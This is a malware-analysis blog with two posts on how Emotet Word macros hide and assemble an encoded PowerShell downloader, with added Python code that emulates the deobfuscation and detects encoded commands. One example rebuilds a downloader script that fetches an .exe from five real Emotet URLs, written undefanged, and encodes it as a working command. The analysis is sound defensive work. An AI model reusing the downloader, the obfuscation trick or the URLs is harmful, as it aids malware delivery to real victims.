Emotet (2020-07-21): Still Making Use of Userforms

DISCLAIMER: Today's sample is not overly complicated at all. Making use of Userforms is nothing new, and anyone can toss an Emotet document into Any.run to grab the base64 encoded PowerShell string being executed.

Yet a malicious document has to store the commands it wants run on the system somewhere. Finding those locations and understanding how they work helps us better understand the tactics, techniques, and procedures (TTPs) of attackers.

Sample: https://app.any.run/tasks/475e4427-efd3-40c6-a19f-8703552d0194
MD5: 6f6987737db0575b978f60be457cd374
SHA256: 12A9D51F23B64A1C6DC2146C8325AD73C6810CCDA73586EEF181C4CDDB309A99

Where We’ve Been

If you are at all familiar with the typical behavior of an Emotet document, you expect WINWORD.exe or WmiPrvSE.exe to spawn powershell.exe and pass it a big string of base64 encoded text. That base64 string decodes to a PowerShell downloader that tries to fetch an .exe from one of five URLs.

Yet where does that string live in the malicious document? Sometimes it is scattered all over the macro before it gets concatenated. Here is an Emotet sample from February 2019, where it is quite easy to see how the PowerShell command and the base64 string get assembled.

At other times, the macro references and grabs strings from a Userform. In this example from May 2019, we see two Userforms named F82063 and N9_9818.

Can someone ask Microsoft to give Snip & Sketch the ability to draw straight lines?

Notice how the macro references components within that Userform. While we can see only one empty box in the Userform above, there is really a stack of them on top of each other. Each has its own name and contains some piece of text. Again, it is not too difficult to see how they get rearranged into the familiar "powershell -e JAB…".

Where We Are Today

Emotet documents are still making use of Userforms, but with a minor twist. In this sample, the long string is brought back into the macro, split apart on a junk delimiter, and then joined to create the "powershell -e JAB…" string.

These are all of the components in the Userform named woicroib. It contains a variety of ComboBoxes, Frames, and even a MultiPage.

The macro line below references the Userform containing the encoded text. woicroib is the name of the Userform, and raopfeukchaup is a MultiPage component within it with two pages. The ControlTipText is then grabbed from the second page. However, that box looks empty.

But it is not. If we put the cursor in there, select all (Ctrl+A), copy (Ctrl+C) and paste it into Notepad, we get this giant string. How is it going to be used in the macro?

Returning to the macro, the string above is assigned to the variable io (line 66), which becomes the argument to the function chiexbeachjeuhkiam (lines 69 and 49). Inside that function the entire string is split (line 53) on another, fixed string of characters and then joined back together with an empty separator (line 59), which simply deletes every occurrence of the delimiter.

We can emulate this behavior quite easily. In our Notepad document, search for the delimiter string from line 53 and replace every occurrence with nothing…

… we get the powershell string!

And as my calculus teacher in college used to say, we’ve reduced this to a previously solved problem.
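The split-and-join above, emulated in Python. This is an added example, not code from the original post: the ControlTipText blob and the line-53 delimiter are not reproduced here, so the script builds its own "powershell -e" command, splices in a made-up junk string as the delimiter, and then undoes it the way VBA's Join(Split(...), "") and the Notepad replace-all do. The JUNK value, the stand-in script body and the function names are all assumptions.

```python
import base64
import re

# Everything here is a constructed stand-in, not the strings from the analysed
# document: the real ControlTipText blob and the delimiter on macro line 53 are
# not reproduced on this page. JUNK plays the role of that delimiter.
JUNK = "Xq9Wz"


def build_sample_blob(script="$Tq='stand-in';", junk=JUNK, every=4):
    """Build a 'powershell -e <base64>' command and hide it the way the
    document does: the junk string is spliced in between short chunks.
    Returns (blob, command) so the caller can check the reconstruction."""
    encoded = base64.b64encode(script.encode("utf-16le")).decode("ascii")
    command = "powershell -e " + encoded
    chunks = [command[i:i + every] for i in range(0, len(command), every)]
    return junk.join(chunks), command


def vba_split_join(blob, delimiter):
    """Emulate VBA Join(Split(blob, delimiter), ""): Split with a multi-
    character delimiter (case-sensitive, binary compare by default), then
    Join with an empty separator. Identical to a replace-all with nothing."""
    return "".join(blob.split(delimiter))


ENCODED_CMD = re.compile(
    r"^powershell(?:\.exe)?\s+-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)\s*$",
    re.IGNORECASE,
)


def is_encoded_powershell(command):
    """True when the string is a well-formed 'powershell -e <base64>' whose
    payload decodes as UTF-16LE. A payload starting with 'JAB' is the base64
    of '$' followed by an ASCII letter in UTF-16LE, which is why these
    commands all begin 'powershell -e JAB'."""
    m = ENCODED_CMD.match(command)
    if not m:
        return False
    try:
        base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return False
    return True


if __name__ == "__main__":
    blob, command = build_sample_blob()
    rebuilt = vba_split_join(blob, JUNK)
    print("delimiter removed cleanly:", rebuilt == command)
    print("looks like an encoded command:", is_encoded_powershell(rebuilt))
```

Python's str.split with a string argument behaves like VBA's Split with a multi-character delimiter, so the emulation is exact; the check at the end is the sanity test worth running before decoding, since a delimiter that was only partly removed will still fail base64 validation rather than silently producing garbage.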

Thanks for reading!

Emotet! (09-16-2019) – Document Analysis

(image: jamesbrown2.jpg)

No, not like James Brown, but after a long summer of lounging by the Black Sea, Emotet has started spamming once again. I’ll be working off of this document here.


Using OfficeMalScanner, we can rip the macros out of the document. We see the typical Sub autoopen() kicking things off. Looking through the code, we can see it creating objects and sewing various variables together.

(screenshot: Emotet3.png)

Opening the document, we can see the new document theme. It's from here that we can step through the macros and see how they're all working together.

(screenshot: Emotet2.png)

While it can be interesting to step through the document, I've explained how to do that on this blog before. I created a stripped-down version where I pulled out only the pieces of code that actually do anything. The "powershell -enco…" string is in green. wpLnXI starts the command through WMI, so WmiPrvSE.exe, not WINWORD.exe, shows up as the parent of powershell.exe.

(screenshot: Emotet.png)

So while the macro has changed a bit since last spring, the encoded PowerShell certainly hasn't. Let's decode that base64 using CyberChef.

(screenshot: Emotet4.png)

Once again, this is not overly complicated. After From Base64 has undone the encoding, use Remove null bytes to clean it up: the -e argument is the script encoded as UTF-16LE, so every ASCII character comes out followed by a 0x00 byte. Split and Extract URLs will complete the job and you ought to be good to go!

hxxp://think1.com/wp-content/upgrade/2na4-4q5g-751619964/
hxxp://broadpeakdefense.com/fbsgf/McZcBMeM/
hxxps://lecairtravels.com/wp-admin/bXwjcdeg/
hxxps://www.biyunhui.com/fj/wbTKndf/
hxxp://nautcoins.com/wp-includes/AcZxFxQ/
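The CyberChef recipe above (From Base64, Remove null bytes, Split, Extract URLs) redone in Python, as an added example rather than anything from the original post. The decoded script is not reproduced on the page, so SAMPLE_SCRIPT is a constructed approximation of the 2019 downloader shape, with the five URLs from the list above joined by '@'; the variable names in it are invented. It also shows why the null-byte trick works and when it does not.

```python
import base64
import re

# Constructed stand-in for the decoded downloader. The page reproduces only
# the five URLs, not the script, so the '@'-joined URL list and the loop
# around it are an approximation of the 2019 Emotet shape and the variable
# names are invented.
SAMPLE_SCRIPT = (
    "$Gkx='http://think1.com/wp-content/upgrade/2na4-4q5g-751619964/"
    "@http://broadpeakdefense.com/fbsgf/McZcBMeM/"
    "@https://lecairtravels.com/wp-admin/bXwjcdeg/"
    "@https://www.biyunhui.com/fj/wbTKndf/"
    "@http://nautcoins.com/wp-includes/AcZxFxQ/'.Split('@');"
    "foreach($u in $Gkx){try{(New-Object Net.WebClient)"
    ".DownloadFile($u,$env:TEMP+'\\x.exe');break}catch{}}"
)


def encode_command(script):
    """What the macro hands to 'powershell -e': base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_cyberchef_style(b64):
    """From Base64, then Remove null bytes, exactly as the recipe above.
    Works because UTF-16LE of ASCII text is each byte followed by 0x00;
    any character above U+00FF is silently mangled."""
    return base64.b64decode(b64).replace(b"\x00", b"").decode("latin-1")


def decode_utf16(b64):
    """The robust alternative: decode the payload as the UTF-16LE it is."""
    return base64.b64decode(b64).decode("utf-16le")


# The '@' separator is in the exclusion set, so the joined list falls apart
# into separate matches without an explicit Split step.
URL_RE = re.compile(r"https?://[^\s'\"@;,)]+")


def extract_urls(script, defang=True):
    """Extract URLs, defanged (http -> hxxp) by default so they are safe to
    paste into a report."""
    urls = URL_RE.findall(script)
    return [u.replace("http", "hxxp", 1) for u in urls] if defang else urls


if __name__ == "__main__":
    encoded = encode_command(SAMPLE_SCRIPT)
    print("encoded argument starts with:", encoded[:12])
    for url in extract_urls(decode_utf16(encoded)):
        print(url)
```

Remove null bytes is a shortcut that holds only while the script is pure ASCII; the moment a non-ASCII character appears in a variable name or string, decoding the payload as UTF-16LE is the only option that gives back the original text.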

Thanks for reading.